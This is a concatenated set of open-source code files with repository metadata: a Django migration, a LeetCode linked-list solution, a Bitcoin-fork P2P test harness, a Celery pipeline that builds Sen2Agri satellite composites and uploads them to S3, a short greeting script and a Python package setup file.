505f95d886144bbafd00797b25bd1c8940529e3f
|
[
"MIT"
] | null | null | null |
like/migrations/0001_initial.py
|
engineer237/Project-Track-Api
|
505f95d886144bbafd00797b25bd1c8940529e3f
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.3 on 2022-04-12 14:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('projects', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Like',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choices', models.CharField(choices=[('like', 'like'), ('unlike', 'unlike')], max_length=10)),
('project', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='projects', to='projects.project')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='users', to=settings.AUTH_USER_MODEL)),
],
),
]
| 36.25
| 152
| 0.64335
|
8832466f0080748ab58ed182b56c139d2895ddc0
| 805
|
py
|
Python
|
143. Reorder List/143. Reorder List.py
|
JawadAsifBD/leetcode
|
15c3bd0363f2a0bf2956fec38c095a955ca6c000
|
[
"MIT"
] | null | null | null |
143. Reorder List/143. Reorder List.py
|
JawadAsifBD/leetcode
|
15c3bd0363f2a0bf2956fec38c095a955ca6c000
|
[
"MIT"
] | null | null | null |
143. Reorder List/143. Reorder List.py
|
JawadAsifBD/leetcode
|
15c3bd0363f2a0bf2956fec38c095a955ca6c000
|
[
"MIT"
] | null | null | null |
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reorderList(self, head: Optional[ListNode]) -> None:
"""
Do not return anything, modify head in-place instead.
"""
res = Deque()
cur = head
while cur:
res.append(cur)
cur = cur.next
prev = None
while len(res) >= 2:
h = res.popleft()
t = res.pop()
if prev:
prev.next = h
h.next = t
prev = t
if len(res) > 0:
h = res.pop()
if prev:
prev.next = h
prev = h
if prev:
prev.next = None
| 23.676471
| 61
| 0.437267
|
b8937c4552267629592829c87850c33dc40f30e5
| 18,398
|
py
|
Python
|
test/functional/test_framework/comptool.py
|
ravenjetcoin/ravenjetcoin
|
6b76a19818f26ffde5bc9dd6bb5385143d8417b3
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/comptool.py
|
ravenjetcoin/ravenjetcoin
|
6b76a19818f26ffde5bc9dd6bb5385143d8417b3
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/comptool.py
|
ravenjetcoin/ravenjetcoin
|
6b76a19818f26ffde5bc9dd6bb5385143d8417b3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Marlin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Compare two or more marlinds to each other.
To use, create a class that implements get_tests(), and pass it in
as the test generator to TestManager. get_tests() should be a python
generator that returns TestInstance objects. See below for definition.
TestNode behaves as follows:
Configure with a BlockStore and TxStore
on_inv: log the message but don't request
on_headers: log the chain tip
on_pong: update ping response map (for synchronization)
on_getheaders: provide headers via BlockStore
on_getdata: provide blocks via BlockStore
"""
from .mininode import *
from .blockstore import BlockStore, TxStore
from .util import p2p_port, wait_until
import logging
logger=logging.getLogger("TestFramework.comptool")
global mininode_lock
class RejectResult():
"""Outcome that expects rejection of a transaction or block."""
def __init__(self, code, reason=b''):
self.code = code
self.reason = reason
def match(self, other):
if self.code != other.code:
return False
return other.reason.startswith(self.reason)
def __repr__(self):
return '%i:%s' % (self.code,self.reason or '*')
class TestNode(NodeConnCB):
def __init__(self, block_store, tx_store):
super().__init__()
self.conn = None
self.bestblockhash = None
self.block_store = block_store
self.block_request_map = {}
self.tx_store = tx_store
self.tx_request_map = {}
self.block_reject_map = {}
self.tx_reject_map = {}
# When the pingmap is non-empty we're waiting for
# a response
self.pingMap = {}
self.lastInv = []
self.closed = False
def on_close(self, conn):
self.closed = True
def add_connection(self, conn):
self.conn = conn
def on_headers(self, conn, message):
if len(message.headers) > 0:
best_header = message.headers[-1]
best_header.calc_sha256()
self.bestblockhash = best_header.sha256
def on_getheaders(self, conn, message):
response = self.block_store.headers_for(message.locator, message.hashstop)
if response is not None:
conn.send_message(response)
def on_getdata(self, conn, message):
[conn.send_message(r) for r in self.block_store.get_blocks(message.inv)]
[conn.send_message(r) for r in self.tx_store.get_transactions(message.inv)]
for i in message.inv:
if i.type == 1:
self.tx_request_map[i.hash] = True
elif i.type == 2:
self.block_request_map[i.hash] = True
def on_inv(self, conn, message):
self.lastInv = [x.hash for x in message.inv]
def on_pong(self, conn, message):
try:
del self.pingMap[message.nonce]
except KeyError:
raise AssertionError("Got pong for unknown ping [%s]" % repr(message))
def on_reject(self, conn, message):
if message.message == b'tx':
self.tx_reject_map[message.data] = RejectResult(message.code, message.reason)
if message.message == b'block':
self.block_reject_map[message.data] = RejectResult(message.code, message.reason)
def send_inv(self, obj):
mtype = 2 if isinstance(obj, CBlock) else 1
self.conn.send_message(msg_inv([CInv(mtype, obj.sha256)]))
def send_getheaders(self):
# We ask for headers from their last tip.
m = msg_getheaders()
m.locator = self.block_store.get_locator(self.bestblockhash)
self.conn.send_message(m)
def send_header(self, header):
m = msg_headers()
m.headers.append(header)
self.conn.send_message(m)
# This assumes BIP31
def send_ping(self, nonce):
self.pingMap[nonce] = True
self.conn.send_message(msg_ping(nonce))
def received_ping_response(self, nonce):
return nonce not in self.pingMap
def send_mempool(self):
self.lastInv = []
self.conn.send_message(msg_mempool())
# TestInstance:
#
# Instances of these are generated by the test generator, and fed into the
# comptool.
#
# "blocks_and_transactions" should be an array of
# [obj, True/False/None, hash/None]:
# - obj is either a CBlock, CBlockHeader, or a CTransaction, and
# - the second value indicates whether the object should be accepted
# into the blockchain or mempool (for tests where we expect a certain
# answer), or "None" if we don't expect a certain answer and are just
# comparing the behavior of the nodes being tested.
# - the third value is the hash to test the tip against (if None or omitted,
# use the hash of the block)
# - NOTE: if a block header, no test is performed; instead the header is
# just added to the block_store. This is to facilitate block delivery
# when communicating with headers-first clients (when withholding an
# intermediate block).
# sync_every_block: if True, then each block will be inv'ed, synced, and
# nodes will be tested based on the outcome for the block. If False,
# then inv's accumulate until all blocks are processed (or max inv size
# is reached) and then sent out in one inv message. Then the final block
# will be synced across all connections, and the outcome of the final
# block will be tested.
# sync_every_tx: analogous to behavior for sync_every_block, except if outcome
# on the final tx is None, then contents of entire mempool are compared
# across all connections. (If outcome of final tx is specified as true
# or false, then only the last tx is tested against outcome.)
class TestInstance():
def __init__(self, objects=None, sync_every_block=True, sync_every_tx=False):
self.blocks_and_transactions = objects if objects else []
self.sync_every_block = sync_every_block
self.sync_every_tx = sync_every_tx
class TestManager():
def __init__(self, testgen, datadir):
self.test_generator = testgen
self.connections = []
self.test_nodes = []
self.block_store = BlockStore(datadir)
self.tx_store = TxStore(datadir)
self.ping_counter = 1
def add_all_connections(self, nodes):
for i in range(len(nodes)):
# Create a p2p connection to each node
test_node = TestNode(self.block_store, self.tx_store)
self.test_nodes.append(test_node)
self.connections.append(NodeConn('127.0.0.1', p2p_port(i), nodes[i], test_node))
# Make sure the TestNode (callback class) has a reference to its
# associated NodeConn
test_node.add_connection(self.connections[-1])
def clear_all_connections(self):
self.connections = []
self.test_nodes = []
def wait_for_disconnections(self):
def disconnected():
return all(node.closed for node in self.test_nodes)
wait_until(disconnected, timeout=10, lock=mininode_lock)
def wait_for_verack(self):
return all(node.wait_for_verack() for node in self.test_nodes)
def wait_for_pings(self, counter):
def received_pongs():
return all(node.received_ping_response(counter) for node in self.test_nodes)
wait_until(received_pongs, lock=mininode_lock)
# sync_blocks: Wait for all connections to request the blockhash given
# then send get_headers to find out the tip of each node, and synchronize
# the response by using a ping (and waiting for pong with same nonce).
def sync_blocks(self, blockhash, num_blocks):
def blocks_requested():
return all(
blockhash in node.block_request_map and node.block_request_map[blockhash]
for node in self.test_nodes
)
# --> error if not requested
wait_until(blocks_requested, attempts=20*num_blocks, lock=mininode_lock)
# Send getheaders message
[ c.cb.send_getheaders() for c in self.connections ]
# Send ping and wait for response -- synchronization hack
[ c.cb.send_ping(self.ping_counter) for c in self.connections ]
self.wait_for_pings(self.ping_counter)
self.ping_counter += 1
# Analogous to sync_block (see above)
def sync_transaction(self, txhash, num_events):
# Wait for nodes to request transaction (50ms sleep * 20 tries * num_events)
def transaction_requested():
return all(
txhash in node.tx_request_map and node.tx_request_map[txhash]
for node in self.test_nodes
)
# --> error if not requested
wait_until(transaction_requested, attempts=20*num_events, lock=mininode_lock)
# Get the mempool
[ c.cb.send_mempool() for c in self.connections ]
# Send ping and wait for response -- synchronization hack
[ c.cb.send_ping(self.ping_counter) for c in self.connections ]
self.wait_for_pings(self.ping_counter)
self.ping_counter += 1
# Sort inv responses from each node
with mininode_lock:
[ c.cb.lastInv.sort() for c in self.connections ]
# Verify that the tip of each connection all agree with each other, and
# with the expected outcome (if given)
def check_results(self, blockhash, outcome):
with mininode_lock:
for c in self.connections:
if outcome is None:
if c.cb.bestblockhash != self.connections[0].cb.bestblockhash:
return False
elif isinstance(outcome, RejectResult): # Check that block was rejected w/ code
if c.cb.bestblockhash == blockhash:
return False
if blockhash not in c.cb.block_reject_map:
logger.error('Block not in reject map: %064x' % (blockhash))
return False
if not outcome.match(c.cb.block_reject_map[blockhash]):
logger.error('Block rejected with %s instead of expected %s: %064x' % (c.cb.block_reject_map[blockhash], outcome, blockhash))
return False
elif ((c.cb.bestblockhash == blockhash) != outcome):
return False
return True
# Either check that the mempools all agree with each other, or that
# txhash's presence in the mempool matches the outcome specified.
# This is somewhat of a strange comparison, in that we're either comparing
# a particular tx to an outcome, or the entire mempools altogether;
# perhaps it would be useful to add the ability to check explicitly that
# a particular tx's existence in the mempool is the same across all nodes.
def check_mempool(self, txhash, outcome):
with mininode_lock:
for c in self.connections:
if outcome is None:
# Make sure the mempools agree with each other
if c.cb.lastInv != self.connections[0].cb.lastInv:
return False
elif isinstance(outcome, RejectResult): # Check that tx was rejected w/ code
if txhash in c.cb.lastInv:
return False
if txhash not in c.cb.tx_reject_map:
logger.error('Tx not in reject map: %064x' % (txhash))
return False
if not outcome.match(c.cb.tx_reject_map[txhash]):
logger.error('Tx rejected with %s instead of expected %s: %064x' % (c.cb.tx_reject_map[txhash], outcome, txhash))
return False
elif ((txhash in c.cb.lastInv) != outcome):
return False
return True
def run(self):
# Wait until verack is received
self.wait_for_verack()
test_number = 1
for test_instance in self.test_generator.get_tests():
# We use these variables to keep track of the last block
# and last transaction in the tests, which are used
# if we're not syncing on every block or every tx.
[ block, block_outcome, tip ] = [ None, None, None ]
[ tx, tx_outcome ] = [ None, None ]
invqueue = []
for test_obj in test_instance.blocks_and_transactions:
b_or_t = test_obj[0]
outcome = test_obj[1]
# Determine if we're dealing with a block or tx
if isinstance(b_or_t, CBlock): # Block test runner
block = b_or_t
block_outcome = outcome
tip = block.sha256
# each test_obj can have an optional third argument
# to specify the tip we should compare with
# (default is to use the block being tested)
if len(test_obj) >= 3:
tip = test_obj[2]
# Add to shared block_store, set as current block
# If there was an open getdata request for the block
# previously, and we didn't have an entry in the
# block_store, then immediately deliver, because the
# node wouldn't send another getdata request while
# the earlier one is outstanding.
first_block_with_hash = True
if self.block_store.get(block.sha256) is not None:
first_block_with_hash = False
with mininode_lock:
self.block_store.add_block(block)
for c in self.connections:
if first_block_with_hash and block.sha256 in c.cb.block_request_map and c.cb.block_request_map[block.sha256] == True:
# There was a previous request for this block hash
# Most likely, we delivered a header for this block
# but never had the block to respond to the getdata
c.send_message(msg_block(block))
else:
c.cb.block_request_map[block.sha256] = False
# Either send inv's to each node and sync, or add
# to invqueue for later inv'ing.
if (test_instance.sync_every_block):
# if we expect success, send inv and sync every block
# if we expect failure, just push the block and see what happens.
if outcome == True:
[ c.cb.send_inv(block) for c in self.connections ]
self.sync_blocks(block.sha256, 1)
else:
[ c.send_message(msg_block(block)) for c in self.connections ]
[ c.cb.send_ping(self.ping_counter) for c in self.connections ]
self.wait_for_pings(self.ping_counter)
self.ping_counter += 1
if (not self.check_results(tip, outcome)):
raise AssertionError("Test failed at test %d" % test_number)
else:
invqueue.append(CInv(2, block.sha256))
elif isinstance(b_or_t, CBlockHeader):
block_header = b_or_t
self.block_store.add_header(block_header)
[ c.cb.send_header(block_header) for c in self.connections ]
else: # Tx test runner
assert(isinstance(b_or_t, CTransaction))
tx = b_or_t
tx_outcome = outcome
# Add to shared tx store and clear map entry
with mininode_lock:
self.tx_store.add_transaction(tx)
for c in self.connections:
c.cb.tx_request_map[tx.sha256] = False
# Again, either inv to all nodes or save for later
if (test_instance.sync_every_tx):
[ c.cb.send_inv(tx) for c in self.connections ]
self.sync_transaction(tx.sha256, 1)
if (not self.check_mempool(tx.sha256, outcome)):
raise AssertionError("Test failed at test %d" % test_number)
else:
invqueue.append(CInv(1, tx.sha256))
# Ensure we're not overflowing the inv queue
if len(invqueue) == MAX_INV_SZ:
[ c.send_message(msg_inv(invqueue)) for c in self.connections ]
invqueue = []
# Do final sync if we weren't syncing on every block or every tx.
if (not test_instance.sync_every_block and block is not None):
if len(invqueue) > 0:
[ c.send_message(msg_inv(invqueue)) for c in self.connections ]
invqueue = []
self.sync_blocks(block.sha256, len(test_instance.blocks_and_transactions))
if (not self.check_results(tip, block_outcome)):
raise AssertionError("Block test failed at test %d" % test_number)
if (not test_instance.sync_every_tx and tx is not None):
if len(invqueue) > 0:
[ c.send_message(msg_inv(invqueue)) for c in self.connections ]
invqueue = []
self.sync_transaction(tx.sha256, len(test_instance.blocks_and_transactions))
if (not self.check_mempool(tx.sha256, tx_outcome)):
raise AssertionError("Mempool test failed at test %d" % test_number)
logger.info("Test %d: PASS" % test_number)
test_number += 1
[ c.disconnect_node() for c in self.connections ]
self.wait_for_disconnections()
self.block_store.close()
self.tx_store.close()
| 45.093137
| 149
| 0.601044
|
2720e91bc30bf9ae3b1e75d301b22a1d046f6bcf
| 15,310
|
py
|
Python
|
worker/tasks/sen2agri_tasks_l3a.py
|
wscullen/tile_viewer_api
|
da4aeb14aefe4ab5e3c1c7f573d726d71a14cbe7
|
[
"MIT"
] | null | null | null |
worker/tasks/sen2agri_tasks_l3a.py
|
wscullen/tile_viewer_api
|
da4aeb14aefe4ab5e3c1c7f573d726d71a14cbe7
|
[
"MIT"
] | null | null | null |
worker/tasks/sen2agri_tasks_l3a.py
|
wscullen/tile_viewer_api
|
da4aeb14aefe4ab5e3c1c7f573d726d71a14cbe7
|
[
"MIT"
] | 1
|
2020-11-04T17:43:32.000Z
|
2020-11-04T17:43:32.000Z
|
""" This job runs Sen2agri atmospheric correction on a L1C Products previously downloaded.
Inputs: ImageryList
Optional Inputs: WindowSize (default 3)
Maja Version (default 3.2.2)
Outputs: Corrected product uploaded
to S3 bucket
Dependencies: maccs-maja, sen2agri installation
Major Steps
1. Parse Imagery List into DateList
2. Create command for each date
For each date
3. Check if L2A results exist already on S3
4. Download L1C and previously created L2A for all Dates but Date 0
5. Run demmaccs.py command for that date
6. Upload resulting L2A imagery to S3
7. Clean up local
Notes:
In the future, a convertion to a COG tif (cloud optimized geotiff) would be a
good addition.
"""
# Create your tasks here
from __future__ import absolute_import, unicode_literals
import boto3
from botocore.client import Config
import botocore
from celery import group, shared_task, task
import click
import logging
import datetime
from django.db.models import Q
from django.conf import settings
from datetime import datetime
from datetime import timedelta
import json
import logging
import math
import multiprocessing
from pathlib import Path
import os
from osgeo import gdal
import re
import shutil
import subprocess
import sys
import tarfile
import time
import zipfile
from common.s3_utils import S3Utility
from common.utils import TaskStatus, unarchive, clean_up_folder, run_cmd
# from landsat_downloader import l8_downloader
from django.conf import settings
s3_helper = S3Utility(settings.S3_CONFIG, Path(settings.BASE_DIR, "working_folder"))
module_logger = logging.getLogger("worker.sen2agri.tasks")
INPUT_BUCKET_NAME = "sen2agri-l2a"
OUTPUT_BUCKET_NAME = "sen2agri-l3a"
WORKING_FOLDER_PATH = Path(settings.BASE_DIR, "working_folder")
STATUS_FOLDER_PATH = Path(WORKING_FOLDER_PATH, "status")
OUTPUT_FOLDER_PATH = Path(WORKING_FOLDER_PATH, "output")
INPUT_FOLDER_PATH = Path(WORKING_FOLDER_PATH, "input")
def write_result_to_status_folder(result_list, job_id):
"""After the job completes it should write out a json file with success info
The Json should be written to the status folder, to be used by the parent
process to report job failure or success to the server
result_list should be a list of tuples with
('sub_task_name', False, 'result_message')
file_name_format = JobStatus_YYYYMMDD_hhmm_job_id.json
"""
date_now = datetime.datetime.now()
date_string = date_now.strftime("%Y%m%d_%H%M")
file_name = f"SimplifyS1Tif_{date_string}_{job_id}.json"
file_full_path = Path(STATUS_FOLDER_PATH, file_name)
with open(file_full_path, "w") as outfile:
json.dump(result_list, outfile)
def find_l2a_path(l1c_path):
module_logger.info(l1c_path)
name = Path(l1c_path).name
module_logger.info(name)
sat = name[2]
date = name.split("_")[2]
orbit = name.split("_")[4]
tile = name.split("_")[5]
l2a_name = None
regex_str = r"S2{}_MSIL2A_{}_N\d{{4}}_{}_{}_\d{{8}}T\d{{6}}.SAFE".format(
sat, date, orbit, tile
)
# iterate over work dir, find a dir that matches the regex
for thing in os.listdir(WORKING_FOLDER_PATH):
module_logger.info(thing)
search_result = re.search(regex_str, thing)
module_logger.info(search_result)
if search_result:
return Path(WORKING_FOLDER_PATH, thing)
return l2a_name
def check_l2a_imagery_exists(imagery_date, tile_name, aoi_name):
"""
imagery date format '20180809'
tile format = 'T14UNV'
"""
logging.info("checking if imagery exists on s2")
logging.info(imagery_date)
logging.info(tile_name)
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
imagery_date, tile_name
)
logging.info(search_expression)
# search_expresssion, object_prefix, bucket_name
object_exists = s3_helper.check_object_exists_in_s3_wildcards(
search_expression, str(Path(aoi_name, "sentinel2")), INPUT_BUCKET_NAME
)
logging.info("object_exists in l2a?")
logging.info(object_exists)
return object_exists
def check_if_l2a_imagery_exists_local(l1c_input):
logging.info(l1c_input)
name_parts = l1c_input.split("_")
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
name_parts[2][:8], name_parts[5]
)
logging.info(search_expression)
result_path = None
for folder in os.listdir(OUTPUT_FOLDER_PATH):
search_result = re.search(search_expression, folder)
logging.info(folder)
if search_result:
result_path = Path(OUTPUT_FOLDER_PATH, folder)
logging.info(result_path)
return result_path
def check_if_l2a_imagery_exists(imagery_date, l1c_name):
logging.info("checking if imagery exists on s2")
logging.info(l1c_name)
name_parts = l1c_name.split("_")
if imagery_date == None:
imagery_date = name_parts[2][:8]
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
imagery_date, name_parts[1]
)
logging.info(search_expression)
logging.info("checking if object exists in s3 with wildcards")
# search_expresssion, object_prefix, bucket_name
object_exists = s3_helper.check_object_exists_in_s3_wildcards(
search_expression, "s2", "sen2agri-l2a"
)
return object_exists
def check_if_l2a_imagery_exists_local_date_tile(current_date, tile):
logging.info(f"checking for local sen2agri for date {current_date} and tile {tile}")
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
current_date, tile
)
logging.info(search_expression)
result_path = None
for folder in os.listdir(WORKING_FOLDER_PATH):
search_result = re.search(search_expression, folder)
logging.info(folder)
if search_result:
result_path = Path(WORKING_FOLDER_PATH, folder)
logging.info(result_path)
return result_path
def find_l2a_xml_paths_in_working_folder(date_list, tile):
path_list = []
logging.info(date_list)
# Example product
# SENTINEL2A_20180521-173646-866_L2A_T14UNA_C_V1-0/
for d in date_list:
for product_dir in os.listdir(WORKING_FOLDER_PATH):
regex_str = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
d, tile
)
logging.info(regex_str)
search_result = re.search(regex_str, product_dir)
if search_result:
for f in os.listdir(Path(WORKING_FOLDER_PATH, product_dir)):
if f.find("MTD_ALL.xml") != -1:
path_list.append(Path(WORKING_FOLDER_PATH, product_dir, f))
break
return path_list
def create_l3a_composite(
synthdate, synth_halflength, tile, imagery_date_list, window_size
):
"""
Major steps:
2. Construct command including imagery
3. Upload result to S3
"""
logging.info("run composite command here\n\n\n\n\n")
logging.info("----------------------------------------")
path_list = find_l2a_xml_paths_in_working_folder(imagery_date_list, tile)
logging.info(path_list)
composite_command = f'/usr/bin/composite_processing.py --tileid {tile} --syntdate {synthdate} --synthalf {synth_halflength} --input {" ".join([str(p) for p in path_list])} --res 10 --outdir {OUTPUT_FOLDER_PATH} --bandsmap /usr/share/sen2agri/bands_mapping_s2_L8.txt --scatteringcoef /usr/share/sen2agri/scattering_coeffs_10m.txt'
logging.info(composite_command)
result = run_cmd(composite_command)
return result
def get_imagery_in_window_from_synthdate(synthdate, all_dates, window_length=30):
synthdate_date = datetime.datetime.strptime(synthdate, "%Y%m%d")
synth_startperiod = synthdate_date - datetime.timedelta(days=window_length)
synth_endperiod = synthdate_date + datetime.timedelta(days=window_length)
synthwindow_dates = []
for d in all_dates:
date_obj = datetime.datetime.strptime(d, "%Y%m%d")
if synth_startperiod <= date_obj <= synth_endperiod:
logging.info("date is in window, adding to list")
synthwindow_dates.append(d)
return synthwindow_dates
@shared_task
def generate_l3a(imagery_list, window_size, aoi_name):
# Determine dates
all_dates = list(imagery_list.keys())
# Determine dates on a per tile basis
tile_dict = {}
for d in all_dates:
image_list = imagery_list[d]
for image in image_list:
# get the tile
tile = image.split("_")[5]
if tile in tile_dict:
tile_dict[tile].append(d)
else:
tile_dict[tile] = []
tile_dict[tile].append(d)
logging.info(imagery_list)
logging.info(tile_dict)
# get date window length divide into 30 days
start_date = datetime.strptime(all_dates[0], "%Y%m%d")
end_date = datetime.strptime(all_dates[-1], "%Y%m%d")
synthdates = []
new_date = start_date
logging.info((end_date - new_date).days)
while (end_date - new_date).days > 30:
new_date = new_date + timedelta(days=30)
synthdates.append(new_date)
logging.info(synthdates)
synthdates_str = [d.strftime("%Y%m%d") for d in synthdates]
logging.info(synthdates_str)
result_list = []
logging.info(window_size)
synth_halflength = math.ceil(window_size / 2)
# length of the synthesis in days (half)
logging.info(synth_halflength)
for tile in tile_dict.keys():
# Fetch L2A imagery for tile (all dates)
imagery_list = []
for d in all_dates:
l2a_exists = check_l2a_imagery_exists(d, tile, aoi_name)
logging.info("intermediate_l2a_exists")
logging.info(l2a_exists)
if l2a_exists.status:
logging.info(
f"\nFor date {d}, prev l2a exists {tile}, trying to download...\n"
)
l2a_download_result = s3_helper.download_l2a_from_s3(
str(Path(aoi_name, "sentinel2", l2a_exists[1])), INPUT_BUCKET_NAME
)
logging.info(l2a_download_result)
if l2a_download_result.status:
imagery_list.append(d)
else:
return TaskStatus(
False,
"There was a problem downloading the l2a imagery",
l2a_exists.message,
)
else:
return TaskStatus(False, "missing l2a imagery, job aborted.", None)
for d in synthdates_str:
logging.info(f"creating composite for tile {tile} and date {d}")
result = create_l3a_composite(
d, synth_halflength, tile, imagery_list, window_size
)
result_list.append(result)
# find l3a result
product_path = None
for f in os.listdir(OUTPUT_FOLDER_PATH):
if f.find("S2AGRI_L3A") != -1:
product_path = Path(OUTPUT_FOLDER_PATH, f)
break
if product_path:
upload_result = s3_helper.upload_unarchived_product_to_s3(
product_path, aoi_name, OUTPUT_BUCKET_NAME
)
else:
upload_result = TaskStatus(
False,
"L3A product could not be found, there was a problem in L3A Creation",
None,
)
if upload_result.status:
shutil.rmtree(product_path)
clean_up_folder(WORKING_FOLDER_PATH)
clean_up_folder(INPUT_FOLDER_PATH)
clean_up_folder(OUTPUT_FOLDER_PATH)
if upload_result.status:
logging.info(upload_result)
logging.info("created composite and uploaded to s3")
result_list.append(TaskStatus(True, f"{tile} - {d}", ""))
else:
logging.info("there was a problem with uploading the composite product")
result_list.append(
TaskStatus(False, f"{tile} - {d}", upload_result.message)
)
return result_list
def start_l3a_job(imagery_list, job_id, aoi_name, window_size=3, maja_ver="3.2.2"):
"""Given the list of input imagery, start the job processes
Major Steps:
1. Generate date array from input imagery list
2. Generate command for each date from 0 to n
3. Run command for date 0
3. Check if expected L2A output exists on S3 bucket, if not:
3. Retrieve l1c imagery for date 0 from S3 bucket, if l1c imagery cannot be found, entire job fails, extract zip
3. Run demmaccs.py for date 0
3. Upload l2a output to S3 bucket
3. Delete local working dir contents
4. Run next command for date 1 to n
4. Check if expected L2A exists on S3 bucket, if not:
4. Retrieve l1c imagery for date i from S3 bucket, if l1c imagery cannot be found, entire job fails, extract zip
4. Retrieve l2a imagery for date i-1, date i-2, date i-3
3. Run demmaccs.py for date i
3. Upload l2a output to S3 bucket
4. Delete local working dir contents
5. If all commands complete successfully, report job complete
6. Else report job failure
imagery list format example:
JSON:
"parameters": {
"aoi_name": "Test Area 2",
"window_size": 3,
"imagery_list": {
"sentinel2": {
"20190613": [
"S2A_MSIL1C_20190613T182921_N0207_R027_T12UUA_20190613T220508"
],
"20190616": [],
"20190618": [
"S2B_MSIL1C_20190618T182929_N0207_R027_T12UUA_20190618T220500"
],
"20190621": [],
"20190623": [],
"20190626": [],
"20190628": [
"S2B_MSIL1C_20190628T182929_N0207_R027_T12UUA_20190628T221748"
],
"20190701": [],
"20190703": [
"S2A_MSIL1C_20190703T182921_N0207_R027_T12UUA_20190703T220857"
],
"20190706": [],
"20190718": [
"S2B_MSIL1C_20190718T182929_N0208_R027_T12UUA_20190718T220349"
],
"20190721": []
}
}
"""
conv_imagery_list = {}
imagery_list = imagery_list["sentinel2"]
for (key, value) in imagery_list.items():
if len(value) > 0:
conv_imagery_list[key] = []
for img in value:
# S2A_MSIL1C_20190703T182921_N0207_R027_T12UUA_20190703T2328
conv_imagery_list[key].append(img)
print(conv_imagery_list)
# Todo: add checks for existing products (to prevent redundant work)
task = generate_l3a.s(conv_imagery_list, window_size, aoi_name)
logging.info(task)
task_result = task.apply_async().get()
json_result = json.dumps(task_result)
return json_result
| 31.308793
| 333
| 0.640105
|
a6047653f7cce9f3731b72c27200720cda412b59
| 258
|
py
|
Python
|
ex08/jennyssecretmessage_vs.py
|
Wassila211/Checkpoint00
|
b46319e754f43b2d7f97cf2135d014f55b46ae16
|
[
"MIT"
] | null | null | null |
ex08/jennyssecretmessage_vs.py
|
Wassila211/Checkpoint00
|
b46319e754f43b2d7f97cf2135d014f55b46ae16
|
[
"MIT"
] | null | null | null |
ex08/jennyssecretmessage_vs.py
|
Wassila211/Checkpoint00
|
b46319e754f43b2d7f97cf2135d014f55b46ae16
|
[
"MIT"
] | null | null | null |
prenom = input("Quel est votre prénom?\n")
if prenom == "Johnny":
print ("je te déteste !")
if prenom == "Paul":
print("Hello my love!")
if prenom == "Marc":
print("Hello my love!")
if prenom == "Ismael":
print("Salut, désolé pas le temps de te parler")
| 25.8
| 49
| 0.643411
|
6e9c92bcdfadb6c41f04583475255c841fdf17e8
| 2,040
|
py
|
Python
|
setup.py
|
fenriques/AstroDom
|
84b54d3299cf591c39b214248339a201ae8ae6ca
|
[
"MIT"
] | 8
|
2020-05-17T14:57:08.000Z
|
2020-12-20T12:29:43.000Z
|
setup.py
|
fenriques/AstroDom
|
84b54d3299cf591c39b214248339a201ae8ae6ca
|
[
"MIT"
] | 2
|
2020-06-04T20:49:09.000Z
|
2020-09-04T12:35:07.000Z
|
setup.py
|
fenriques/AstroDom
|
84b54d3299cf591c39b214248339a201ae8ae6ca
|
[
"MIT"
] | null | null | null |
############################################################
# -*- coding: utf-8 -*-
#
# Astroimaging catalogue software
#
# Ferrante Enriques
# (c) 2020
#
# License MIT
#
###########################################################
from setuptools import setup, find_packages
import codecs
import os
def read(rel_path):
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, rel_path), "r") as fp:
return fp.read()
def get_version(rel_path):
for line in read(rel_path).splitlines():
if line.startswith("__version__"):
# __version__ = "0.9"
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
else:
raise RuntimeError("Unable to find version string.")
long_description = read("README.md")
setup(
name="astrodom",
version=get_version("astrodom/__init__.py"),
packages=find_packages(),
python_requires=">=3.6, <3.9",
install_requires=[
"astropy==4.0",
"matplotlib==3.1.3",
"PyQt5==5.13.2",
"pyqtgraph==0.10.0",
"numpy==1.18.2",
"pandas==1.0.3"
],
include_package_data=True,
url="https://github.com/fenriques/AstroDom",
license="MIT",
author="Ferrante Enriques",
author_email="ferrante.enriques@gmail.com",
description="Astroimaging Catalogue Software",
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: X11 Applications :: Qt",
"Environment :: Other Environment",
"Programming Language :: Python :: 3 :: Only",
"Operating System :: Microsoft :: Windows :: Windows 10",
"Operating System :: POSIX :: Linux",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Astronomy",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
],
)
| 29.142857
| 65
| 0.580392
|
a72158c3abf5d2c00d58cdd369f0b26c5c1bca43
| 7,434
|
py
|
Python
|
examples/adhoc_provider.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
"BSD-3-Clause"
] | null | null | null |
examples/adhoc_provider.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
"BSD-3-Clause"
] | null | null | null |
examples/adhoc_provider.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
